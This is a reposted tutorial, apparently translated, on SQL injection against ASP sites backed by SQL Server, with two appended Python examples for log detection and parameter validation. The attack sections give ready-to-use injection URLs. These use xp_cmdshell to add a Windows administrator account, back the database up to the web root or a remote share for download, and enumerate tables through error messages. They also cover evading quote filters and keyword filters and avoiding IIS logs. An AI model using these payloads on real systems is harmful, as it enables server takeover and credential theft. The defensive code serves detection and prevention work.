[SQL] SQL Injection: ASP Injection Vulnerabilities from A to Z - Advanced Part

xiaoxiao2021-03-06  67

After reading the beginner and intermediate parts and practising a little, cracking an ordinary website is no problem. But what if you cannot guess the table or column names, or the program's author has filtered some special characters? How do you raise the success rate of an injection, and how do you guess more efficiently? Read on into the advanced part.

Section I: Using system tables to inject into a SQL Server database

SQL Server is a powerful database system that is closely tied to the operating system. This is very convenient for developers, but on the other hand it also gives an injector a springboard. Let's look at a few concrete examples:

① http://site/url.asp?id=1;exec master..xp_cmdshell "net user name password /add"--

In SQL Server the semicolon separates two statements, and -- marks the rest of the line as a comment, so SQL Server runs this as two statements: first it selects the record with id=1, then it executes the stored procedure xp_cmdshell, which is used to invoke system commands. The net command therefore creates a Windows account with user name name and password password. Next:

② http://site/url.asp?id=1;exec master..xp_cmdshell "net localgroup name administrators /add"--

This adds the new account name to the Administrators group; in no time at all you hold the highest privilege on the system! Of course, this method only applies when the application connects to the database as sa; otherwise there is no permission to call xp_cmdshell.

③ http://site/url.asp?id=1;;and db_name()>0

There was a similar example earlier, and user>0, which obtains the name of the connected user; db_name() is another system variable and returns the name of the connected database.

④ http://site/url.asp?id=1;backup database DatabaseName to disk='c:\inetpub\wwwroot\1.db';--

This is a rather vicious trick: with the database name obtained in ③, plus an absolute path exposed by some IIS error message, the database is backed up into the web directory and the whole thing is then downloaded over HTTP, leaving every administrator and user password in plain view! When the absolute path is not known, backing up to a network address (such as \\202.96.xx.xx\share\1.db) is also possible, but the success rate is low.

⑤ http://site/url.asp?id=1;;and (select top 1 name from sysobjects where xtype='u' and status>0)>0

As mentioned earlier, sysobjects is a SQL Server system table that stores the names of all tables, views, constraints and other objects; xtype='u' and status>0 selects the tables created by users. The statement above takes the first table name and compares it with 0, so that the error message exposes the table name. How do you get the second and third table names? We leave that for our clever readers to think about.

⑥ http://site/url.asp?id=1;;and (select top 1 col_name(object_id('TableName'),1) from sysobjects)>0

Having obtained the table name from ⑤, object_id('TableName') returns the table's internal ID, and col_name(TableID,1) is the name of that table's first column; changing 1 to 2, 3, 4 ... retrieves the column names of the guessed table one by one. The six points above are the fruit of my painstaking study of SQL Server injection; as you can see, how well you understand SQL Server directly determines the success rate and the guessing speed. Since studying SQL Server injection my development skills have also improved a great deal; perhaps security and development complement each other after all.

Section II: Bypassing program restrictions to continue injecting

As mentioned in the beginner part, many people like to test for injection vulnerabilities with the ' character, so many people also "prevent" injection by filtering out ' . That may stop some beginners, but anyone familiar with SQL injection can still use the relevant functions to bypass the program's restrictions.

In the "SQL Injection" section, the statements I used were optimised so that they contain no single quotes; in "Using system tables to inject into a SQL Server database", some statements do contain a ' character. Let's take an example and see how these statements can be rewritten:

A simple one is where xtype='u': the ASCII code of the character u is 85, so where xtype=char(85) can be used instead. If the characters are Chinese, for example where name='用户' (Chinese for "user"), then where name=nchar(29992)+nchar(25143) can be used instead.

Section III: Lessons from experience

1. Some people filter keywords such as select, update and delete, but forget to make the comparison case-insensitive, so everyone can try selecT and the like.

2. When you cannot guess a column name, take a look at the site's login form; for convenience, column names are usually the same as the names of the form's input fields.

3. Special note: a + in the address bar is interpreted by the program as a space, %2B is interpreted as +, and %25 as %; see the documentation on URL encoding for details.

4. When injecting with the GET method, IIS records your entire submitted query string, but it does not record POST data; so where a URL accepts POST, try not to use GET.

5. When guessing an Access database you can only decode the value character by character through its ASCII code; SQL Server can use the same method with only minor differences, but if SQL Server's error messages can be made to expose the value, efficiency and accuracy improve enormously.
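Taken together, sections I to III describe exactly what a defender can look for in the IIS log mentioned in point 4. The following Python script is an added example, not part of the original article: it normalizes each logged query string the way the server would (URL decoding per point 3, case folding per point 1, and folding the char()/nchar() rewrites of section II back into literals) and then flags the statements of section I; the log lines, field layout and indicator names are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style log lines: date time c-ip cs-method cs-uri-stem cs-uri-query.
SAMPLE_LOG = """\
2004-01-01 10:00:01 10.0.0.5 GET /url.asp id=1
2004-01-01 10:00:02 10.0.0.5 GET /url.asp id=1;;and+db_name()%3E0
2004-01-01 10:00:03 10.0.0.5 GET /url.asp id=1;;and+(SeLeCt+top+1+name+from+sysobjects+where+xtype%3Dchar(85)+and+status%3E0)%3E0
2004-01-01 10:00:04 10.0.0.5 GET /url.asp id=1;exec+master..xp_cmdshell+%22net+user+name+password+/add%22--
2004-01-01 10:00:05 10.0.0.9 GET /news.asp id=42
"""

# Indicators taken from the statements in sections I and III, matched on normalized text.
INDICATORS = {
    "stacked_exec": re.compile(r";\s*exec\b"),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b"),
    "backup_database": re.compile(r"\bbackup\s+database\b"),
    "sysobjects": re.compile(r"\bsysobjects\b"),
    "db_name": re.compile(r"\bdb_name\s*\("),
    "col_name": re.compile(r"\bcol_name\s*\("),
    "blind_compare": re.compile(r"\band\s+\(?\s*select\s+top\s+1\b"),
}
CHAR_CALL = re.compile(r"\bn?char\s*\(\s*(\d+)\s*\)", re.IGNORECASE)

def fold_char_calls(text: str) -> str:
    """Turn the char(85)/nchar(29992) rewrites of section II back into the literal they encode."""
    text = CHAR_CALL.sub(lambda m: "'" + chr(int(m.group(1))) + "'", text)
    # 'a'+'b' collapses to 'ab' so a rebuilt string looks like the literal it replaces
    return re.sub(r"'\s*\+\s*'", "", text)

def normalize_query(raw: str) -> str:
    """Decode as the server does ('+' -> space, %XX -> byte), fold char() calls, fold case."""
    return fold_char_calls(unquote_plus(raw)).lower()

def scan_log(log_text: str):
    """Return (line_no, normalized_query, [indicator names]) for each line that trips an indicator."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        fields = line.split(" ", 5)
        if len(fields) < 6:
            continue
        query = normalize_query(fields[5])
        names = [name for name, rx in INDICATORS.items() if rx.search(query)]
        if names:
            hits.append((n, query, names))
    return hits

for n, query, names in scan_log(SAMPLE_LOG):
    print(f"line {n}: {', '.join(names)}: {query}")
```

Because the log only holds GET query strings, the same normalization has to be applied to POST bodies at the application or proxy layer to cover point 4.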

Defence methods

SQL injection vulnerabilities are a case of "a thousand-mile dike breached by an ant hole": they are extremely common online, usually because the programmer does not understand injection, the program's filtering is not strict, or some parameter was never checked. Here I give you a function that replaces the Request function in ASP and can say no to all SQL injection. The function is as follows:

Function SafeRequest(ParaName, ParaType)
'--- Parameters ---
'ParaName: parameter name, a string
'ParaType: parameter type, numeric (1 means the parameter is a number, 0 means it is a string)
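The body of SafeRequest is cut off on this page, so the following is an added Python rendering of its contract, not the author's ASP code: a numeric parameter (ParaType 1) must be a pure integer and is rejected otherwise, and a string parameter (ParaType 0) is passed to the database as a bound query parameter instead of being concatenated into the statement. The sqlite3 tables, rows and the get_news/find_user handlers are constructed stand-ins for the article's url.asp.

```python
import re
import sqlite3

class BadParameter(ValueError):
    """Raised instead of letting a suspect value reach the query."""

def safe_request(params: dict, para_name: str, para_type: int):
    """Python rendering of SafeRequest(ParaName, ParaType).
    para_type 1: value must be a plain integer (so '1;;and db_name()>0' is rejected).
    para_type 0: value is returned unchanged and must only ever be bound, never concatenated."""
    value = params.get(para_name, "")
    if para_type == 1:
        if not re.fullmatch(r"\d+", value):
            raise BadParameter(f"{para_name} must be an integer, got {value!r}")
        return int(value)
    return value

def build_db() -> sqlite3.Connection:
    # Constructed stand-in for the article's SQL Server tables; sqlite3 runs offline.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE admin(username TEXT, password TEXT);
        INSERT INTO news VALUES (1, 'hello'), (2, 'world');
        INSERT INTO admin VALUES ('root', 'secret');
    """)
    return conn

def get_news(conn: sqlite3.Connection, params: dict):
    """What url.asp?id=... should do: a typed parameter and a bound query."""
    news_id = safe_request(params, "id", 1)
    row = conn.execute("SELECT title FROM news WHERE id = ?", (news_id,)).fetchone()
    return row[0] if row else None

def find_user(conn: sqlite3.Connection, params: dict):
    """String parameter: bound, so quote and char() tricks are compared as text, never executed."""
    name = safe_request(params, "username", 0)
    row = conn.execute("SELECT username FROM admin WHERE username = ?", (name,)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = build_db()
    print(get_news(db, {"id": "1"}))
    try:
        get_news(db, {"id": "1;;and db_name()>0"})
    except BadParameter as exc:
        print("rejected:", exc)
```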

Please credit the original address when reposting: https://www.9cbs.com/read-88577.html
